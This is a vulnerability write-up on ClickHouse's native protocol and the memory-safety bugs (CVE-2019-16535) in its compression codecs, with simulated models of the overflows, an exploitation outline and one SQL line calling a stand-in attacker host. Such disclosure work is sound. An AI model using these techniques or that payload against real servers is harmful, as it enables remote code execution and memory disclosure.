ClickHouse is a fast and nice open-source OLAP database management system. The server provides several network interfaces: HTTP and the native protocol. There is also a replication protocol, which we'll talk about next time.
The HTTP interface is pretty simple, but the native one is complex and powerful, and it has no formal specification. Nice stuff to research.
TL;DR: the native protocol is quite fragile and should be available to database administrators only.
By default, the native protocol is available on TCP port 9000.
The first byte specifies the packet type. The server expects to receive Client::Hello (0) as the first packet from a client.
It was nice to see protection against SSRF inside the Hello parsing function: if the first byte of the packet is “G” or “P”, the packet is treated as an HTTP GET or POST request and the server responds with HTTP code 400.
In the Client::Hello packet, a client must pass its name, version, database name, login and password for the connection.
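To make the Hello packet more concrete, here is a minimal sketch of how such a packet could be assembled. It is not taken from the ClickHouse sources. It assumes that integers travel as LEB128-style variable-length unsigned integers, that strings are sent as a length prefix followed by raw UTF-8 bytes, and that the version is sent as major, minor and protocol revision. The helper names (`encode_varuint`, `encode_string`, `build_client_hello`) and all sample values are hypothetical.

```python
CLIENT_HELLO = 0  # packet type from the text: Client::Hello (0)


def encode_varuint(value: int) -> bytes:
    """Encode a non-negative integer as a LEB128-style varint (assumed wire format)."""
    if value < 0:
        raise ValueError("varuint cannot be negative")
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # high bit set: more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def encode_string(text: str) -> bytes:
    """Encode a string as varuint length + UTF-8 bytes (assumed wire format)."""
    raw = text.encode("utf-8")
    return encode_varuint(len(raw)) + raw


def build_client_hello(name, major, minor, revision, database, user, password) -> bytes:
    """Assemble the fields named in the text, in an assumed order."""
    return b"".join([
        encode_varuint(CLIENT_HELLO),
        encode_string(name),
        encode_varuint(major),
        encode_varuint(minor),
        encode_varuint(revision),
        encode_string(database),
        encode_string(user),
        encode_string(password),
    ])


# Hypothetical sample values, for illustration only.
packet = build_client_hello("demo client", 19, 14, 54425, "default", "default", "")
```

The first byte of `packet` is the packet type, so it can never be mistaken for the “G” or “P” of an HTTP request.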
After authentication, the client can send one of the following types of packets:
- Client::Query (1) — SQL query, its query ID, settings, etc.;
- Client::Data (2) — query data if required (INSERT);
- Client::Cancel (3) — server interrupts the execution of the request, for example, if after the Query request the client decided not to send data;
- Client::Ping (4) — server always responds with Protocol::Server::Pong;
- Client::TablesStatusRequest (5) — server must respond with the table replication status and the replication delay;
- Client::KeepAlive (6) — keep alive.
The server can respond with one of the following types of packets:
- Server::Hello (0) — name, version;
- Server::Data (1) — data block;
- Server::Exception (2) — exception descriptions caused during a query execution;
- Server::Progress (3) — query progress (rows read, bytes etc);
- Server::Pong (4) — response to Protocol::Client::Ping;
- Server::EndOfStream (5) — EOF, all packets transferred;
- Server::ProfileInfo (6) — query profiling information;
- Server::Totals (7) — block with totals (for queries that calculate them);
- Server::Extremes (8) — block with minimums and maximums;
- Server::TablesStatusResponse (9) — response to TablesStatusRequest;
- Server::Log (10) — query execution log;
- Server::TableColumns (11) — table columns schema.
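The two lists above map naturally onto a pair of enumerations. The sketch below simply restates the packet numbers from this article. The function `classify_first_byte` is a hypothetical helper that mimics the first-byte rule described earlier, where “G” and “P” are treated as HTTP. It is not the server's actual code.

```python
from enum import IntEnum


class ClientPacket(IntEnum):
    HELLO = 0
    QUERY = 1
    DATA = 2
    CANCEL = 3
    PING = 4
    TABLES_STATUS_REQUEST = 5
    KEEP_ALIVE = 6


class ServerPacket(IntEnum):
    HELLO = 0
    DATA = 1
    EXCEPTION = 2
    PROGRESS = 3
    PONG = 4
    END_OF_STREAM = 5
    PROFILE_INFO = 6
    TOTALS = 7
    EXTREMES = 8
    TABLES_STATUS_RESPONSE = 9
    LOG = 10
    TABLE_COLUMNS = 11


def classify_first_byte(first_byte: int) -> str:
    """Hypothetical helper: decide what the first byte of a client message means."""
    if first_byte in (ord("G"), ord("P")):
        return "http"  # looks like GET/POST; the server answers with HTTP 400
    try:
        return ClientPacket(first_byte).name
    except ValueError:
        return "unknown"
```

For example, `classify_first_byte(0)` yields `"HELLO"`, while `classify_first_byte(ord("G"))` yields `"http"`.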
Minimal client-server interaction example (INSERT request):
Note that in the Query packet the client can send serialized settings for the query and the connection. For example, a client can enable or disable stack traces (enabled by default).
In older versions of ClickHouse, a client could even override readonly and elevate its privileges.
For more efficient data transfer, some packets (Data, Totals, etc.) can be compressed. Data I/O is implemented on top of the abstract class ReadBuffer.
Compressed buffers are implemented in CompressedReadBuffer.
The stream buffers are a custom analogue of std::istream.
Several compression algorithms are available; each has its own implementation of the CompressionCodec interface on top of a third-party library.
CompressionCodec implements the following methods:
- Byte identifying the compression algorithm of the current codec:
UInt8 getMethodByte()
- Human-readable name of the compression codec (ZSTD, LZ4, etc.):
String getCodecDesc()
- Compress source_size bytes from the buffer source into the preallocated buffer dest and return the size of the compressed data:
UInt32 compress(const char *source, UInt32 source_size, char *dest)
- Decompress source_size bytes from the buffer source into the preallocated buffer dest and return the size of the decompressed data:
UInt32 decompress(const char *source, UInt32 source_size, char *dest)
- Return the number of bytes required to store uncompressed_size bytes compressed with this algorithm:
UInt32 getCompressedReserveSize(UInt32 uncompressed)
- Number of bytes at the end of the buffer required by the codec, 0 by default:
UInt32 getAdditionalSizeAtTheEndOfBuffer()
- Size of the compression header, 9 bytes by default (COMPRESSED_BLOCK_HEADER_SIZE):
UInt8 getHeaderSize()
- Read the compressed block size from user input:
Int32 readCompressedBlockSize(const char* source)
- Read the decompressed block size:
static UInt32 readDecompressedBlockSize(const char* source)
- Read the codec byte:
static UInt8 readMethod(const char *source)
- Compress source_size bytes from source and put the result into dest:
UInt32 doCompressData(const char* source, UInt32 source_size, char *dest)
- Decompress source_size bytes from source and put the result into dest; the size of the decompressed data is given in uncompressed_size:
void doDecompressData(const char *source, UInt32 source_size, char *dest, UInt32 uncompressed_size)
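The three static readers above all operate on the 9-byte block header. As a rough illustration, the sketch below parses such a header. It assumes a layout of one method byte followed by two little-endian 32-bit integers (compressed size, then decompressed size), which adds up to the 9 bytes of COMPRESSED_BLOCK_HEADER_SIZE. The Python function names are hypothetical counterparts of the C++ methods, not the real implementation.

```python
import struct

COMPRESSED_BLOCK_HEADER_SIZE = 9  # value given in the text

# Assumed layout: method byte, compressed size, decompressed size (little-endian).
HEADER = struct.Struct("<BII")


def read_method(header: bytes) -> int:
    """Codec byte, e.g. 0x82 for LZ4 or 0x90 for ZSTD."""
    return header[0]


def read_compressed_block_size(header: bytes) -> int:
    """Client-controlled size of the compressed block."""
    return struct.unpack_from("<I", header, 1)[0]


def read_decompressed_block_size(header: bytes) -> int:
    """Client-controlled size of the data after decompression."""
    return struct.unpack_from("<I", header, 5)[0]


def parse_header(header: bytes):
    """Return (method, compressed_size, decompressed_size) or raise on short input."""
    if len(header) < COMPRESSED_BLOCK_HEADER_SIZE:
        raise ValueError("header too short")
    return HEADER.unpack_from(header)


# Hypothetical sample header: LZ4, 25 compressed bytes, 64 decompressed bytes.
sample = HEADER.pack(0x82, 25, 64)
```

Both size fields come straight from the wire, so everything computed from them needs validation before it is used as a buffer size.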
Some of you will have noticed right away that fixed-width integers are used for sizes in these methods, while the rest of the ClickHouse code is written in neat C++ using string literals and memsize types. Such “joints” are usually the source of problems and vulnerabilities.
Every time you use an integer to store a buffer size, a cute puppy dies somewhere.
The client largely controls the data that the server has to decompress, so let’s look at the corresponding methods.
The initial idea of this research was to implement fuzz tests for the data reading methods rather than analyze them manually. For example, you can fuzz the column description parser separately, since column descriptions are also read from the client. But ClickHouse calculates checksums for transferred data blocks, so fuzzing the network part without disabling checksum verification would be ineffective.
Let’s look at the function that reads data and calls the codec implementations:
Read the checksum (L25), header (L29) and codec marker (L31) from the buffer.
Create an instance of the codec, if it is supported:
- NONE (0x02) — no compression;
- LZ4 (0x82) — LZ4HC;
- ZSTD (0x90) — ZSTD;
- Multiple (0x91) — multiple layers;
- Delta (0x92) — Delta;
- T64 (0x93) — T64;
- DoubleDelta (0x94) — DoubleDelta;
- Gorilla (0x95) — Gorilla.
Read the compressed data size (L42, controlled by the client) and the decompressed data size (L43, controlled by the client).
Check that the data size is not too big (L45, DBMS_MAX_COMPRESSED_SIZE = 1 GB), resize the buffers, read the data and validate the checksum (L69).
Allocate a buffer of size_decompressed + getAdditionalSizeAtTheEndOfBuffer() bytes and use it for decompress().
What’s wrong with this code?
There is no check that size_compressed_without_checksum >= header_size.
The result of an arithmetic operation on unsigned integers is used as a memsize type.
If the client sends size_compressed_without_checksum=1, then the subtraction source_size - header_size yields 1 - 9 = 0xfffffff8, and we get an integer underflow.
Further program behavior depends on how this data is used in wrappers over codecs (doDecompressData() method).
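The arithmetic is easy to reproduce. Python integers do not wrap around, so the sketch below emulates UInt32 behaviour with a mask. The function names are hypothetical, and the checked variant shows only one possible guard, not necessarily the fix that went into ClickHouse.

```python
HEADER_SIZE = 9           # COMPRESSED_BLOCK_HEADER_SIZE from the text
UINT32_MASK = 0xFFFFFFFF  # emulates UInt32 wrap-around in Python


def payload_size_unchecked(size_compressed_without_checksum: int) -> int:
    """Model of the vulnerable subtraction: the result wraps like a UInt32."""
    return (size_compressed_without_checksum - HEADER_SIZE) & UINT32_MASK


def payload_size_checked(size_compressed_without_checksum: int) -> int:
    """Same subtraction, guarded by the lower-bound check that was missing."""
    if size_compressed_without_checksum < HEADER_SIZE:
        raise ValueError("compressed size is smaller than the header")
    return size_compressed_without_checksum - HEADER_SIZE
```

With an input of 1, `payload_size_unchecked` returns `0xFFFFFFF8`, a length of almost 4 GB, while `payload_size_checked` rejects the block.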
Let’s look inside some of them. The Delta, DoubleDelta and Gorilla codecs begin in a very similar way:
The client controls size_decompressed (the size of the allocated buffer dest) and bytes_to_skip.
By sending size_decompressed=1 and bytes_to_skip=255, a client can overwrite up to 254 bytes of the neighboring heap object. This is the first step to RCE.
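The effect can be illustrated with a toy model of the heap. This is not the codec's real code. It assumes that bytes_to_skip bytes are copied verbatim into dest without comparing against the buffer size, as described above, and it represents the heap as a Python `bytearray` in which the neighboring object sits directly after dest. All function names are hypothetical.

```python
def copy_skipped_bytes(heap, dest_offset, dest_size, payload, bytes_to_skip):
    """Copy bytes_to_skip bytes into dest with no bounds check (memcpy-like).

    Returns the number of bytes written past the end of dest.
    """
    for i in range(bytes_to_skip):
        heap[dest_offset + i] = payload[i]
    return max(0, bytes_to_skip - dest_size)


def copy_skipped_bytes_checked(heap, dest_offset, dest_size, payload, bytes_to_skip):
    """Same copy, but refuse to write more than dest can hold."""
    if bytes_to_skip > dest_size:
        raise ValueError("bytes_to_skip exceeds the destination buffer")
    return copy_skipped_bytes(heap, dest_offset, dest_size, payload, bytes_to_skip)


# Values from the text: a 1-byte dest buffer and 255 bytes to copy.
size_decompressed = 1
bytes_to_skip = 255

# Simulated heap: dest (1 byte) followed by a 254-byte neighboring object.
heap = bytearray(size_decompressed) + bytearray(b"N" * 254)
overflow = copy_skipped_bytes(heap, 0, size_decompressed, b"A" * bytes_to_skip, bytes_to_skip)
```

After the call, `overflow` is 254 and every byte of the simulated neighbor has been replaced with attacker-supplied data.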
Modern Linux systems use various protection mechanisms preventing vulnerability exploitation, such as Address Space Layout Randomization (ASLR). In short, every time a binary is launched, its address space layout (including the heap and stack addresses) changes.
To turn this vulnerability into RCE, an attacker also needs to leak libc and heap addresses.
Well, there is a libc address in the stack trace.
Let’s check the Multiple codec for a way to leak addresses from the heap:
The data buffer is implemented as PODArray, an analogue of std::vector, and the client data is copied into it.
What if the client sends compression_method_size=0?
The loop will not run, and the attacker will be able to copy decompressed_size (which the client controls) bytes from compressed_buf to dest and get an OOB read!
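Again, a toy model helps to see what leaks. The sketch below is not the Multiple codec itself. It assumes only what is described above: with zero nested codecs nothing is decompressed, and decompressed_size bytes are then copied out of compressed_buf without checking its real length. The heap is modelled as a `bytes` object in which other data follows the buffer, and the function names are hypothetical.

```python
def multiple_decompress_model(heap, buf_offset, buf_size,
                              compression_method_size, decompressed_size):
    """Toy model of the final copy when no nested codecs are declared."""
    if compression_method_size != 0:
        raise NotImplementedError("nested codecs are not modelled here")
    # memcpy-like copy: decompressed_size is never compared with buf_size.
    return heap[buf_offset:buf_offset + decompressed_size]


def multiple_decompress_checked(heap, buf_offset, buf_size,
                                compression_method_size, decompressed_size):
    """Same model with a bounds check on the copy length."""
    if decompressed_size > buf_size:
        raise ValueError("decompressed_size exceeds the source buffer")
    return multiple_decompress_model(heap, buf_offset, buf_size,
                                     compression_method_size, decompressed_size)


# Simulated heap: 8 bytes of client data followed by unrelated heap contents.
client_data = b"ATTACKER"
heap = client_data + b"SECRET-HEAP-DATA"

result = multiple_decompress_model(heap, 0, len(client_data), 0, 24)
leaked = result[len(client_data):]
```

Here `leaked` holds the 16 bytes that follow the client's buffer, which in a real process could include heap pointers.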
Now the attacker has three components to exploit the vulnerability:
- libc address
- OOB read on a heap
- OOB write on a heap
This vulnerability can also be triggered via SQL injection — using external tables.
The attacker runs a fake ClickHouse server and sends a query:
SELECT * FROM remote('attacker-server.com','default.blah','default','qwerty');
The fake server needs to answer with Hello and TablesStatusResponse packets and then send a malicious data block.
The vulnerable version of ClickHouse uses jemalloc 5.0 as its allocator.
Jemalloc stores metadata and allocated data separately, so the usual heap overflow exploitation methods do not work here.
Jemalloc allocates memory in bins, which are chosen by the size of the allocated object.
That means an attacker can try a type-confusion-like technique: find a suitable class (X) and make ClickHouse allocate a sufficient number of objects of this class.
Then make the codec allocate a buffer of the same size as an object of class X (so that the attacker's buffer lands in the same bin as the target object), and try to overwrite the object's vtable with the OOB write.
Sorry, there is no RCE PoC in this writeup.
This (CVE-2019-16535) and other vulnerabilities were fixed in ClickHouse version 19.14.3.3.